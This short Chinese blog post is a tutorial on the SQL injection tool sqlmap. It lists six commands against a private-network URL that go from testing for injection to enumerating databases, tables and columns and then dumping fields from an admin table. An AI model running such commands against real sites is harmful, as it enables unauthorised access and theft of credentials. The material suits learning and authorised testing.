博客园 首页 私信博主 显示目录 隐藏目录 管理 动画

sql 注入工具sqlmap的使用

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79” 测试当前连接是否为注入点

 

 

 

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--dbs 获取数据库列表

 

 

 

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--current-db 获取当前网站所链接的数据库

 

 

 

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--tables -D“目标数据库” 获取目标数据库所有表信息

 

 

 

 

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--columns -T“管理员表”-D“目标数据库”

 

 

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--dump -C“字段”-T“管理员表”-D“目标数据库”

 

 

 

posted @ 2019-09-16 18:37  【Abel】  阅读(282)  评论(0编辑  收藏  举报